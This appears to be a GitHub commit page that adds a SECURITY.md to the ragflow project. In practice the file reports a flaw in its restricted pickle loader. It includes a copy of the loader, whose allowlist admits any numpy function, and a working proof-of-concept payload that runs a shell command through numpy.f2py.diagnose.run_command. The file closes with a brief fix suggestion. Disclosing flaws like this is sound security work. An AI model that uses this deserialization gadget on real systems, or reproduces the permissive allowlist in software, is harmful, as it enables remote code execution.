Create SECURITY.md (#1241)
Browse files### What problem does this PR solve?
The restricted_loads function at
[api/utils/init.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215)
is still vulnerable leading via code execution. The main reson is that
numpy module has a numpy.f2py.diagnose.run_command function directly
execute commands, but the restricted_loads function allows users import
functions in module numpy.
### Additional Details
[https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
- SECURITY.md +74 -0
|
@@ -0,0 +1,74 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Security Policy
|
| 2 |
+
|
| 3 |
+
## Supported Versions
|
| 4 |
+
|
| 5 |
+
Use this section to tell people about which versions of your project are
|
| 6 |
+
currently being supported with security updates.
|
| 7 |
+
|
| 8 |
+
| Version | Supported |
|
| 9 |
+
| ------- | ------------------ |
|
| 10 |
+
| <0.7.0 | :white_check_mark: |
|
| 11 |
+
|
| 12 |
+
## Reporting a Vulnerability
|
| 13 |
+
|
| 14 |
+
### Branch name
|
| 15 |
+
|
| 16 |
+
main
|
| 17 |
+
|
| 18 |
+
### Actual behavior
|
| 19 |
+
|
| 20 |
+
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
| 21 |
+
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
### Steps to reproduce
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
**ragflow_patch.py**
|
| 28 |
+
|
| 29 |
+
```py
|
| 30 |
+
import builtins
|
| 31 |
+
import io
|
| 32 |
+
import pickle
|
| 33 |
+
|
| 34 |
+
safe_module = {
|
| 35 |
+
'numpy',
|
| 36 |
+
'rag_flow'
|
| 37 |
+
}
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
class RestrictedUnpickler(pickle.Unpickler):
|
| 41 |
+
def find_class(self, module, name):
|
| 42 |
+
import importlib
|
| 43 |
+
if module.split('.')[0] in safe_module:
|
| 44 |
+
_module = importlib.import_module(module)
|
| 45 |
+
return getattr(_module, name)
|
| 46 |
+
# Forbid everything else.
|
| 47 |
+
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
| 48 |
+
(module, name))
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def restricted_loads(src):
|
| 52 |
+
"""Helper function analogous to pickle.loads()."""
|
| 53 |
+
return RestrictedUnpickler(io.BytesIO(src)).load()
|
| 54 |
+
```
|
| 55 |
+
Then, **PoC.py**
|
| 56 |
+
```py
|
| 57 |
+
import pickle
|
| 58 |
+
from ragflow_patch import restricted_loads
|
| 59 |
+
class Exploit:
|
| 60 |
+
def __reduce__(self):
|
| 61 |
+
import numpy.f2py.diagnose
|
| 62 |
+
return numpy.f2py.diagnose.run_command, ('whoami', )
|
| 63 |
+
|
| 64 |
+
Payload=pickle.dumps(Exploit())
|
| 65 |
+
restricted_loads(Payload)
|
| 66 |
+
```
|
| 67 |
+
**Result**
|
| 68 |
+
|
| 69 |
+
|
| 70 |
+
|
| 71 |
+
### Additional information
|
| 72 |
+
|
| 73 |
+
#### How to prevent?
|
| 74 |
+
Strictly filter the module and name before calling with getattr function.
|